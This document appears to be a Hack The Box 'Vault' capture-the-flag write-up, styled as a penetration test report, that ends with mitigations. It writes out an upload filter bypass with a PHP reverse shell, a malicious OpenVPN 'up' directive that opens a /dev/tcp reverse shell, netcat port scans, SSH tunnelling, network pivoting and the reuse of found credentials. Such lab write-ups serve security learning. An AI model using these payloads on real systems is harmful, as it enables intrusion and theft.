htb-writeups

Vault Penetration Test Report

Executive Summary

This comprehensive penetration test against target 10.129.26.16 revealed a critical vulnerability chain leading to complete network compromise. The attack path progressed from web application exploitation through internal network pivoting to ultimate domain dominance.

Initial Reconnaissance

Network Mapping

# Set target variable
export target=10.129.26.16

# Comprehensive port scan - TCP connect scan
sudo nmap -p- --min-rate 1000 -sT -vvv $target

# Results:
# Discovered open ports: 22/tcp, 80/tcp

Service Enumeration

# Detailed service scan on discovered ports
sudo nmap -sC -sV -p 22,80 -T4 $target

# Results:
# Port 22: OpenSSH 7.6p1 Ubuntu
# Port 80: Apache httpd 2.4.29

---

Web Application Enumeration

Manual Exploration

• Visited http://10.129.26.16/

• Discovered references to “sparklays” in page content
• Manual check of http://10.129.26.16/sparklays/ - Directory exists!

Systematic Directory Bruteforcing

# First-level directory scanning
gobuster dir -u http://10.129.26.16/sparklays \
  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
  -x php,txt,html -t 50 2>/dev/null

# Discovered: /design/ directory

# Second-level directory scanning
gobuster dir -u http://10.129.26.16/sparklays/design \
  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
  -x php,txt,html -t 50 2>/dev/null

Discovered Endpoints:

• http://10.129.26.16/sparklays/design/uploads/ - File upload directory
• http://10.129.26.16/sparklays/design/design.html - Design management interface
• http://10.129.26.16/sparklays/design/changelogo.php - Logo upload functionality

---

File Upload Vulnerability Exploitation

Vulnerability Analysis

• Accessed http://10.129.26.16/sparklays/design/design.html
• Clicked “Change logo” → Redirected to changelogo.php
• File upload functionality identified
• Tested various PHP extensions: .php, .php3, .phtml, .php4, .php5
• Finding: .php5 extension bypassed filters

Reverse Shell Deployment

# Created PHP reverse shell (modified from pentestmonkey)
# Saved as revshell.php5 with attacker IP: 10.10.14.90, port: 9001

# Start netcat listener
nc -nlvp 9001

# Upload shell through web interface
# Success message received: "File uploaded successfully"

# Trigger shell execution
curl http://10.129.26.16/sparklays/design/uploads/revshell.php5

Result: Reverse shell connection established as www-data user

---

Initial Foothold & Internal Discovery

Initial Enumeration

# Basic system reconnaissance
whoami
# www-data

hostname
# ubuntu

pwd
# /var/www/html/sparklays/design/uploads

# Explore user directories
ls -la /home/
# Found user: dave

cd /home/dave/Desktop
ls -la

Critical Data Discovery

# Found three important files:
cat Servers
# DNS + Configurator - 192.168.122.4
# Firewall - 192.168.122.5
# The Vault - x

cat key
# itscominghome

cat ssh
# dave
# Dav3therav3123

Internal Network Scanning

# Scan internal DNS server from compromised host
for i in $(seq 1 1000); do 
  (nc -nzv 192.168.122.4 ${i} 2>&1 | grep -v "Connection refused" &); 
done

# Results: Ports 22 and 80 open on 192.168.122.4

---

SSH Tunneling & Internal Service Access

Port Forwarding Setup

# From attacker machine, establish SSH tunnel
ssh -L 80:192.168.122.4:80 dave@10.129.26.16
# Password: Dav3therav3123

Internal Web Application Assessment

• Accessed http://127.0.0.1:80 in browser

• Discovered DNS configuration interface
• VPN Configuration Page: http://127.0.0.1/vpnconfig.php

• OpenVPN configuration file upload functionality identified

---

OpenVPN Configuration Injection

OpenVPN Reverse Shell Research

• Researched OpenVPN configuration exploits
• Found technique for command execution via up directive
• Reference: https://medium.com/tenable-techblog/reverse-shell-from-an-openvpn-configuration-file-73fd8b1d38da

Malicious OVPN Configuration

# Malicious OpenVPN configuration
remote 192.168.122.1
ifconfig 10.200.0.2 10.200.0.1
dev tun
script-security 2
nobind
up "/bin/bash -c '/bin/bash -i > /dev/tcp/192.168.122.1/1337 0<&1 2>&1&'"

Shell Execution

# Start listener for DNS server shell
nc -nlvp 1337

# Upload malicious .ovpn file through web interface
# Shell connection established as root on DNS server!

---

DNS Server Compromise

DNS Server Enumeration

whoami
# root

hostname
# DNS

# Locate user flag
find / -name user.txt 2>/dev/null
cat /home/dave/user.txt
# a4947faa8d4e1f80771d34234bd88c73

# Discover additional credentials
cat /home/dave/ssh
# dave
# dav3gerous567

Network Route Discovery

# Check network configuration
route -n
# Found route to 192.168.5.0/24 via 192.168.122.5

cat /etc/hosts
# Found entry: vault 192.168.5.2

# Test connectivity
ping vault
# Packet loss - routing issue identified

---

Network Pivoting to The Vault

Network Configuration Adjustment

# Add correct IP address to interface
ip address add 192.168.5.137/24 dev ens3

# Remove incorrect route
route del -net 192.168.5.0 netmask 255.255.255.0 gw 192.168.122.5

# Verify connectivity
ping -c 2 192.168.5.2
# Success!

Vault Service Discovery

# Port scan The Vault
for i in $(seq 1 1000); do 
  (nc -nzv 192.168.5.2 ${i} 2>&1 | grep -v "Connection refused" &); 
done

# Results: Port 987 open (non-standard SSH)

---

Vault System Breach

SSH Access to The Vault

# Connect using discovered credentials
ssh dave@vault -p 987
# Password: dav3gerous567

# Successfully logged into The Vault system

Flag Discovery & Extraction

# Search for root flag
find / -name root* 2>/dev/null
# Found: /root/root.txt.gpg (encrypted)

# As dave user, cannot directly read /root/ files
# Need to transfer encrypted file for decryption

# From DNS server, transfer the file
scp -P 987 dave@192.168.5.2:~/root.txt.gpg /dev/shm/

---

GPG Decryption & Final Flag

File Transfer via Base64

# On DNS server, encode the file
cd /dev/shm
base64 -w0 root.txt.gpg
# [Long base64 string output]

# On initial compromised host (dave@ubuntu)
echo "hQIMA8d4xhDR6x8DARAAoJjq0xo2bn5JfY3Q6EMVZjkwUK7JPcwUEr1RNUx98k41oOFdtugxUjwHSZ9x9BU9sph696HhlKlPO0au7DeFyxqPFbjR2CdwoT9PBf8vuSEzEqVltvAq31jQbXpUSA2AxYSj3fWKCAkIPcUBTTcJAnac0EMmXlAQzdAmvFEU+9BRkcpJDSpYV8W2IQf+fsnh14hcc5tXZQZX0mPtLlwYVlJq4xgpV3znnJrrlUgKJqkqhq1i2/JEAL5Ul1k5as9Ha1N8KffjmfEsrRQl8TS5NLoC3mVp3w90X0LYhyDcRz7HPzXfdPMdM+G9NEX1zY4c6cr1sxOdLcpUwbZ4itd7XjCA71B23Ncd7eniLGCkErDaVkZh8oa4DyIG78bxqFTDgk6XrH6pz9XRXhDBSZnCezI90WkbxGecOB42cAOwGkuHcnSF44eXDT60Yl9h6bvRZVEQF3/39ee+nMaW5b5PnWzGb/PC4kT3ZDeWYSiloF6a5sOwDO2CL/qipnAFPj8UthhrCCcQj4rRH2zeeh4y9fh3m3G37Q+U9lNgpjzj0nzVCfjdrMRvUs5itxwpjwaxN6q2q1kxe1DhPCzaAHhLT7We7p2hxdSj1yPgefSzJ39GENgJI1fbTDEaMzwkPra4I2MiJCEVgZnV29oRHPYrmGsfx4tSkBy6tJW342/s88fSZAFwRHa6C9Hrr7GSVucoJ5z2kNKAPnS/cUmBc3OdeJlMxdfzQTMucmv89wwgNgKNLO6wmSFppVRnpmLE+AFoCEqg/JS91N5mVhZPkHwW6V94CxMF/3xqTMKpzBfdERq0MGYij98=" | base64 -d > root.txt.gpg

GPG Decryption

# Attempt decryption with various passphrases
gpg -d root.txt.gpg

# When prompted for passphrase, tried:
# - dav3gerous567 (failed)
# - Dav3therav3123 (failed)
# - itscominghome (SUCCESS!)

cat root.txt
# ca468370b91d1f5906e31093d9bfe819

---

Attack Path Summary

1. External Recon → Port 80 web service
2. Directory Enumeration → /sparklays/design/ discovered
3. File Upload Bypass → .php5 extension accepted
4. Reverse Shell → www-data access gained
5. Credential Discovery → dave user credentials found
6. Internal Network Mapping → DNS server identified
7. SSH Tunneling → Internal service access achieved
8. OpenVPN Injection → Root on DNS server
9. Network Pivoting → The Vault system accessed
10. Lateral Movement → Vault compromised via SSH
11. Data Exfiltration → Encrypted flag transferred
12. Decryption → Final root flag obtained

---

Critical Vulnerabilities Identified

1. Unrestricted File Upload (Critical)

• Location: /sparklays/design/changelogo.php
• Impact: Remote code execution
• Root Cause: Insufficient file extension validation

2. OpenVPN Configuration Injection (Critical)

• Location: Internal DNS configurator
• Impact: Privilege escalation to root
• Root Cause: Lack of input sanitization

3. Weak Credential Management (High)

• Impact: Lateral movement enabled
• Examples: Reused passwords, plaintext storage

4. Network Segmentation Failure (High)

• Impact: Internal network exposure
• Root Cause: Improper firewall rules

5. Cryptographic Weakness (Medium)

• Impact: Encrypted data compromise
• Root Cause: Weak GPG passphrase

---

Mitigation Recommendations

Immediate Actions (Critical)

1. Patch File Upload Vulnerability
   • Implement strict file type verification
   • Use allow-list approach for extensions
   • Store files outside web root with random names
2. Secure OpenVPN Configuration
   • Validate configuration files before processing
   • Restrict script execution in OpenVPN context
   • Implement digital signatures for configs
3. Credential Reset & Management
   • Reset all discovered passwords immediately
   • Implement password complexity requirements
   • Deploy multi-factor authentication

Medium-term Improvements

1. Network Segmentation
   • Implement proper DMZ architecture
   • Restrict internal service access
   • Deploy network monitoring
2. Application Hardening
   • Regular security testing
   • Web Application Firewall deployment
   • Input validation frameworks

Long-term Strategy

1. Security Awareness
   • Developer security training
   • Secure coding practices
   • Incident response planning
2. Continuous Monitoring
   • SIEM implementation
   • Regular penetration testing
   • Vulnerability management program

---

Tools Utilized

• Nmap: Port scanning and network enumeration
• Gobuster: Directory brute-forcing on web servers
• Netcat: Reverse shell setup and simple TCP listener
• SSH: Secure tunneling and remote access
• OpenVPN: Configuration injection through malicious .ovpn file uploads
• GPG: File decryption and encryption handling
• SCP: Secure file transfer over SSH

---

Testing Methodology: OSSTMM compliant
Risk Rating: Critical